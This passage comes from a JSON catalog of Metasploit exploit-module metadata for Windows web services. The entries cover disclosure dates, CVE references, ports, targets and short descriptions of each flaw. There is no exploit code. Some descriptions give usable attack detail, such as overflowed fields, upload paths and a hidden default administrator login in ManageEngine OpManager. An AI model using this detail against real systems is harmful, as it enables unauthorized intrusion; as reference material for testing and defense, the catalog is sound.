"full_name": "exploit/windows/http/integard_password_bof",
"rank": 500,
"disclosure_date": "2010-09-07",
"type": "exploit",
"author": [
"Lincoln",
"Nullthreat",
"rick2600",
"corelanc0d3r <peter.ve@corelan.be>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Race river's Integard Home/Pro\n internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n vulnerable.\n\n The administration web page on port 18881 is vulnerable to a remote buffer overflow\n attack. By sending a long character string in the password field, both the structured\n exception handler and the saved extended instruction pointer are over written, allowing\n an attacker to gain control of the application and the underlying operating system\n remotely.\n\n The administration website service runs with SYSTEM privileges, and automatically\n restarts when it crashes.",
"references": [
"OSVDB-67909",
"URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061"
],
"platform": "Windows",
"arch": "",
"rport": 18881,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"Integard Home 2.0.0.9021",
"Integard Pro 2.2.0.9026"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/integard_password_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/integard_password_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/intersystems_cache": {
"name": "InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow",
"full_name": "exploit/windows/http/intersystems_cache",
"rank": 500,
"disclosure_date": "2009-09-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.",
"references": [
"OSVDB-60549",
"BID-37177"
],
"platform": "Windows",
"arch": "",
"rport": 57772,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/intersystems_cache.rb",
"is_install_path": true,
"ref_name": "windows/http/intersystems_cache",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/intrasrv_bof": {
"name": "Intrasrv 1.0 Buffer Overflow",
"full_name": "exploit/windows/http/intrasrv_bof",
"rank": 0,
"disclosure_date": "2013-05-30",
"type": "exploit",
"author": [
"xis_one",
"PsychoSpy <neinwechter@gmail.com>"
],
"description": "This module exploits a boundary condition error in Intrasrv Simple Web\n Server 1.0. The web interface does not validate the boundaries of an\n HTTP request string prior to copying the data to an insufficiently sized\n buffer. Successful exploitation leads to arbitrary remote code execution\n in the context of the application.",
"references": [
"OSVDB-94097",
"EDB-18397",
"BID-60229"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"v1.0 - XP / Win7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/intrasrv_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/intrasrv_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ipswitch_wug_maincfgret": {
"name": "Ipswitch WhatsUp Gold 8.03 Buffer Overflow",
"full_name": "exploit/windows/http/ipswitch_wug_maincfgret",
"rank": 500,
"disclosure_date": "2004-08-25",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By\n posting a long string for the value of 'instancename' in the _maincfgret.cgi\n script an attacker can overflow a buffer and execute arbitrary code on the system.",
"references": [
"CVE-2004-0798",
"OSVDB-9177",
"BID-11043"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WhatsUP Gold 8.03 Universal"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb",
"is_install_path": true,
"ref_name": "windows/http/ipswitch_wug_maincfgret",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/jira_collector_traversal": {
"name": "JIRA Issues Collector Directory Traversal",
"full_name": "exploit/windows/http/jira_collector_traversal",
"rank": 300,
"disclosure_date": "2014-02-26",
"type": "exploit",
"author": [
"Philippe Arteau",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists\n in the issues collector code, while handling attachments provided by the user. It can be\n exploited in Windows environments to get remote code execution. This module has been tested\n successfully on JIRA 6.0.3 with Windows 2003 SP2 Server.",
"references": [
"CVE-2014-2314",
"OSVDB-103807",
"BID-65849",
"URL-https://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2014-02-26",
"URL-http://blog.h3xstream.com/2014/02/jira-path-traversal-explained.html"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Jira 6.0.3 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/jira_collector_traversal.rb",
"is_install_path": true,
"ref_name": "windows/http/jira_collector_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/kaseya_uploader": {
"name": "Kaseya VSA uploader.aspx Arbitrary File Upload",
"full_name": "exploit/windows/http/kaseya_uploader",
"rank": 600,
"disclosure_date": "2015-09-23",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions\n between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary\n directory leading to arbitrary code execution with IUSR privileges. This module has been\n tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.",
"references": [
"CVE-2015-6922",
"ZDI-15-449",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt",
"URL-https://seclists.org/bugtraq/2015/Sep/132"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Kaseya VSA v7 to v9.1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/kaseya_uploader.rb",
"is_install_path": true,
"ref_name": "windows/http/kaseya_uploader",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/kaseya_uploadimage_file_upload": {
"name": "Kaseya uploadImage Arbitrary File Upload",
"full_name": "exploit/windows/http/kaseya_uploadimage_file_upload",
"rank": 600,
"disclosure_date": "2013-11-11",
"type": "exploit",
"author": [
"Thomas Hibbert <thomas.hibbert@security-assessment.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability found in Kaseya versions below\n 6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous\n authentication, leading to arbitrary code execution with IUSR privileges.",
"references": [
"OSVDB-99984",
"BID-63782",
"EDB-29675",
"URL-http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Kaseya KServer / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/kaseya_uploadimage_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/kolibri_http": {
"name": "Kolibri HTTP Server HEAD Buffer Overflow",
"full_name": "exploit/windows/http/kolibri_http",
"rank": 400,
"disclosure_date": "2010-12-26",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"TheLeader",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.",
"references": [
"CVE-2002-2268",
"OSVDB-70808",
"BID-6289",
"EDB-15834"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP sp3",
"Windows Server 2003 sp2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/kolibri_http.rb",
"is_install_path": true,
"ref_name": "windows/http/kolibri_http",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/landesk_thinkmanagement_upload_asp": {
"name": "LANDesk Lenovo ThinkManagement Console Remote Command Execution",
"full_name": "exploit/windows/http/landesk_thinkmanagement_upload_asp",
"rank": 600,
"disclosure_date": "2012-02-15",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module can be used to execute a payload on LANDesk Lenovo\n ThinkManagement Suite 9.0.2 and 9.0.3.\n\n The payload is uploaded as an ASP script by sending a specially crafted\n SOAP request to \"/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx\"\n , via a \"RunAMTCommand\" operation with the command '-PutUpdateFileCore'\n as the argument.\n\n After execution, the ASP script with the payload is deleted by sending\n another specially crafted SOAP request to \"WSVulnerabilityCore/VulCore.asmx\"\n via a \"SetTaskLogByFile\" operation.",
"references": [
"CVE-2012-1195",
"CVE-2012-1196",
"OSVDB-79276",
"OSVDB-79277",
"BID-52023",
"EDB-18622",
"EDB-18623"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb",
"is_install_path": true,
"ref_name": "windows/http/landesk_thinkmanagement_upload_asp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/lexmark_markvision_gfd_upload": {
"name": "Lexmark MarkVision Enterprise Arbitrary File Upload",
"full_name": "exploit/windows/http/lexmark_markvision_gfd_upload",
"rank": 600,
"disclosure_date": "2014-12-09",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.\n A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated\n attacker to upload arbitrary files, including arbitrary JSP code. This module has been\n tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.",
"references": [
"CVE-2014-8741",
"ZDI-14-410",
"URL-http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US"
],
"platform": "Windows",
"arch": "java",
"rport": 9788,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Lexmark Markvision Enterprise 2.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/lexmark_markvision_gfd_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/mailenable_auth_header": {
"name": "MailEnable Authorization Header Buffer Overflow",
"full_name": "exploit/windows/http/mailenable_auth_header",
"rank": 500,
"disclosure_date": "2005-04-24",
"type": "exploit",
"author": [
"David Maciejak <david.maciejak@kyxar.fr>"
],
"description": "This module exploits a remote buffer overflow in the MailEnable web service.\n The vulnerability is triggered when a large value is placed into the Authorization\n header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and\n MailEnable Professional versions prior to 1.55 are affected.",
"references": [
"CVE-2005-1348",
"OSVDB-15913",
"OSVDB-15737",
"BID-13350",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=18123"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MEHTTPS.exe Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/mailenable_auth_header.rb",
"is_install_path": true,
"ref_name": "windows/http/mailenable_auth_header",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/manage_engine_opmanager_rce": {
"name": "ManageEngine OpManager Remote Code Execution",
"full_name": "exploit/windows/http/manage_engine_opmanager_rce",
"rank": 0,
"disclosure_date": "2015-09-14",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a default credential vulnerability in ManageEngine OpManager, where a\n default hidden account \"IntegrationUser\" with administrator privileges exists. The account\n has a default password of \"plugin\" which cannot be reset through the user interface. By\n log-in and abusing the default administrator's SQL query functionality, it's possible to\n write a WAR payload to disk and trigger an automatic deployment of this payload. This\n module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows.",
"references": [
"EDB-38174",
"CVE-2015-7765",
"CVE-2015-7766",
"URL-https://seclists.org/fulldisclosure/2015/Sep/66",
"URL-https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability"
],
"platform": "Java",
"arch": "java",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ManageEngine OpManager <= v11.6"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/manage_engine_opmanager_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/manage_engine_opmanager_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/manageengine_adshacluster_rce": {
"name": "Manage Engine Exchange Reporter Plus Unauthenticated RCE",
"full_name": "exploit/windows/http/manageengine_adshacluster_rce",
"rank": 600,
"disclosure_date": "2018-06-28",
"type": "exploit",
"author": [
"Kacper Szurek <kacperszurek@gmail.com>"
],
"description": "This module exploits a remote code execution vulnerability that\n exists in Exchange Reporter Plus <= 5310, caused by execution of\n bcp.exe file inside ADSHACluster servlet",
"references": [
"URL-https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 8181,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-12 14:27:28 +0000",
"path": "/modules/exploits/windows/http/manageengine_adshacluster_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/manageengine_adshacluster_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/manageengine_appmanager_exec": {
"name": "ManageEngine Applications Manager Remote Code Execution",
"full_name": "exploit/windows/http/manageengine_appmanager_exec",
"rank": 600,
"disclosure_date": "2018-03-07",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits command injection vulnerability in the ManageEngine Application Manager product.\n An unauthenticated user can execute a operating system command under the context of privileged user.\n\n Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials\n by accessing given system. This endpoint calls a several internal classes and then executes powershell script\n without validating user supplied parameter when the given system is OfficeSharePointServer.",
"references": [
"CVE-2018-7890",
"BID-103358",
"URL-https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/",
"URL-https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-03-19 23:27:18 +0000",
"path": "/modules/exploits/windows/http/manageengine_appmanager_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/manageengine_appmanager_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/manageengine_apps_mngr": {
"name": "ManageEngine Applications Manager Authenticated Code Execution",
"full_name": "exploit/windows/http/manageengine_apps_mngr",
"rank": 200,
"disclosure_date": "2011-04-08",
"type": "exploit",
"author": [
"Jacob Giannantonio <JGiannan@gmail.com>"
],
"description": "This module logs into the Manage Engine Applications Manager to upload a\n payload to the file system and a batch script that executes the payload.",
"references": [
"EDB-17152"
],
"platform": "Windows",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/http/manageengine_apps_mngr.rb",
"is_install_path": true,
"ref_name": "windows/http/manageengine_apps_mngr",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/manageengine_connectionid_write": {
"name": "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",
"full_name": "exploit/windows/http/manageengine_connectionid_write",
"rank": 600,
"disclosure_date": "2015-12-14",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n inject a null bye at the end of the value to create a malicious file with an arbitrary\n file type, and then place it under a directory that allows server-side scripts to run,\n which results in remote code execution under the context of SYSTEM.\n\n Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n but older ones run on port 8040. Also, using this exploit will leave debugging information\n produced by FileUploadServlet in file rdslog0.txt.\n\n This exploit was successfully tested on version 9, build 90109 and build 91084.",
"references": [
"URL-https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
"CVE-2015-8249"
],
"platform": "Windows",
"arch": "",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ManageEngine Desktop Central 9 on Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb",
"is_install_path": true,
"ref_name": "windows/http/manageengine_connectionid_write",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/maxdb_webdbm_database": {
"name": "MaxDB WebDBM Database Parameter Overflow",
"full_name": "exploit/windows/http/maxdb_webdbm_database",
"rank": 400,
"disclosure_date": "2006-08-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. By sending a specially-crafted HTTP request that contains\n an overly long database name. A remote attacker could overflow a buffer\n and execute arbitrary code on the system with privileges of the wahttp process.\n\n This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.",
"references": [
"CVE-2006-4305",
"OSVDB-28300",
"BID-19660"
],
"platform": "Windows",
"arch": "",
"rport": 9999,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MaxDB 7.6.00.16",
"MaxDB 7.6.00.27"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/maxdb_webdbm_database.rb",
"is_install_path": true,
"ref_name": "windows/http/maxdb_webdbm_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/maxdb_webdbm_get_overflow": {
"name": "MaxDB WebDBM GET Buffer Overflow",
"full_name": "exploit/windows/http/maxdb_webdbm_get_overflow",
"rank": 400,
"disclosure_date": "2005-04-26",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. This service is included with many recent versions\n of the MaxDB and SAPDB products. This particular module is\n capable of exploiting Windows systems through the use of an\n SEH frame overwrite. The offset to the SEH frame may change\n depending on where MaxDB has been installed, this module\n assumes a web root path with the same length as:\n\n C:\\Program Files\\sdb\\programs\\web\\Documents",
"references": [
"CVE-2005-0684",
"OSVDB-15816",
"URL-http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities",
"BID-13368"
],
"platform": "Windows",
"arch": "",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MaxDB 7.5.00.11 / 7.5.00.24",
"Windows 2000 English",
"Windows XP English SP0/SP1",
"Windows 2003 English",
"Windows NT 4.0 SP4/SP5/SP6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/maxdb_webdbm_get_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/mcafee_epolicy_source": {
"name": "McAfee ePolicy Orchestrator / ProtectionPilot Overflow",
"full_name": "exploit/windows/http/mcafee_epolicy_source",
"rank": 200,
"disclosure_date": "2006-07-17",
"type": "exploit",
"author": [
"muts <muts@remote-exploit.org>",
"xbxice <xbxice@yahoo.com>",
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This is an exploit for the McAfee HTTP Server (NAISERV.exe).\n McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are\n known to be vulnerable. By sending a large 'Source' header, the stack can\n be overwritten. This module is based on the exploit by xbxice and muts.\n Due to size constraints, this module uses the Egghunter technique.",
"references": [
"CVE-2006-5156",
"OSVDB-29421",
"EDB-2467",
"BID-20288"
],
"platform": "Windows",
"arch": "x86",
"rport": 81,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"ePo 2.5.1 (Service Pack 1)",
"ePo 3.5.0/ProtectionPilot 1.1.0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/mcafee_epolicy_source.rb",
"is_install_path": true,
"ref_name": "windows/http/mcafee_epolicy_source",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/mdaemon_worldclient_form2raw": {
"name": "MDaemon WorldClient form2raw.cgi Stack Buffer Overflow",
"full_name": "exploit/windows/http/mdaemon_worldclient_form2raw",
"rank": 500,
"disclosure_date": "2003-12-29",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for\n versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),\n a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,\n by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),\n the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based\n overflow occurs when an excessively long From field is specified.\n The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.\n Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.\n\n Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very\n reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will\n continue to crash/execute the payload until the CGI output is manually deleted\n from the queue in C:\\MDaemon\\RawFiles\\*.raw.",
"references": [
"CVE-2003-1200",
"OSVDB-3255",
"BID-9317"
],
"platform": "Windows",
"arch": "x86",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal MDaemon.exe",
"Debugging test"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb",
"is_install_path": true,
"ref_name": "windows/http/mdaemon_worldclient_form2raw",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/minishare_get_overflow": {
"name": "Minishare 1.4.1 Buffer Overflow",
"full_name": "exploit/windows/http/minishare_get_overflow",
"rank": 200,
"disclosure_date": "2004-11-07",
"type": "exploit",
"author": [
"acaro <acaro@jervus.it>"
],
"description": "This is a simple buffer overflow for the minishare web\n server. This flaw affects all versions prior to 1.4.2. This\n is a plain stack buffer overflow that requires a \"jmp esp\" to reach\n the payload, making this difficult to target many platforms\n at once. This module has been successfully tested against\n 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.",
"references": [
"CVE-2004-2271",
"OSVDB-11530",
"BID-11620",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows 2000 SP0-SP3 English",
"Windows 2000 SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows 2003 SP0 English",
"Windows 2003 SP1 English",
"Windows 2003 SP2 English",
"Windows NT 4.0 SP6",
"Windows XP SP2 German",
"Windows XP SP2 Polish",
"Windows XP SP2 French",
"Windows XP SP3 French"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/minishare_get_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/minishare_get_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/miniweb_upload_wbem": {
"name": "MiniWeb (Build 300) Arbitrary File Upload",
"full_name": "exploit/windows/http/miniweb_upload_wbem",
"rank": 600,
"disclosure_date": "2013-04-09",
"type": "exploit",
"author": [
"AkaStep",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in MiniWeb HTTP server (build 300).\n The software contains a file upload vulnerability that allows an\n unauthenticated remote attacker to write arbitrary files to the file system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.",
"references": [
"OSVDB-92198",
"OSVDB-92200",
"PACKETSTORM-121168"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MiniWeb build 300 on Windows (Before Vista)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/http/miniweb_upload_wbem.rb",
"is_install_path": true,
"ref_name": "windows/http/miniweb_upload_wbem",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/navicopa_get_overflow": {
"name": "NaviCOPA 2.0.1 URL Handling Buffer Overflow",
"full_name": "exploit/windows/http/navicopa_get_overflow",
"rank": 500,
"disclosure_date": "2006-09-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in NaviCOPA 2.0.1.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.",
"references": [
"CVE-2006-5112",
"OSVDB-29257",
"BID-20250"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NaviCOPA 2.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/navicopa_get_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/navicopa_get_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/netdecision_http_bof": {
"name": "NetDecision 4.5.1 HTTP Server Buffer Overflow",
"full_name": "exploit/windows/http/netdecision_http_bof",
"rank": 300,
"disclosure_date": "2012-02-24",
"type": "exploit",
"author": [
"Prabhu S Angadi",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in NetDecision's HTTP service\n (located in C:\\Program Files\\NetDecision\\Bin\\HttpSvr.exe). By supplying a\n long string of data to the URL, an overflow may occur if the data gets handled\n by HTTP Server's active window. In other words, in order to gain remote code\n execution, the victim is probably looking at HttpSvr's window.",
"references": [
"CVE-2012-1465",
"OSVDB-79651",
"URL-http://secunia.com/advisories/48168/",
"URL-http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NetDecision 4.5.1 on XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/netdecision_http_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/netdecision_http_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/netgear_nms_rce": {
"name": "NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",
"full_name": "exploit/windows/http/netgear_nms_rce",
"rank": 600,
"disclosure_date": "2016-02-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
